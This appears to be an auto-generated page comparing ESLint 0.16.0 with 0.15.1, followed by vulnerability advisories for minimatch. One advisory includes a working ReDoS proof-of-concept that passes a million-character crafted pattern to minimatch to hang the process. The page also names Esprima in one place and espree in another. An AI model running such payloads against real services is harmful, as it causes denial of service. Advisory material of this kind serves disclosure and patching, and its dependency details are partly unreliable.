ESLint version 0.16.0 marks an incremental update over its predecessor, version 0.15.1, both serving as linters to identify and report on patterns found in ECMAScript/JavaScript code. While the core functionality remains consistent, several dependency updates differentiate the two. Esprima, the JavaScript parser, sees an upgrade from version 1.9.1 to version 1.11.0. This may bring enhanced support for newer JavaScript syntax and potentially introduce changes in how the code is parsed, impacting linting rules. Similarly, escope experiences a bump from 2.0.4 to 2.0.6, potentially affecting variable scope analysis and related linting rules.
Developers should note the updated dependencies, primarily espree and escope as these directly impact how ESLint parses and understands the code. These updates could affect which code patterns are flagged and how existing rules behave.
The update offers potential improvements in identifying and reporting JavaScript code patterns; however, users should test the new version against their existing codebases to ensure compatibility and address any unexpected changes in linting behavior. The updated dependencies can also fix some compatibility issues with the new code syntax. Both versions share the MIT license and are available on GitHub, reflecting a commitment to open-source development.
All the vulnerabilities related to the version 0.16.0 of the package
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.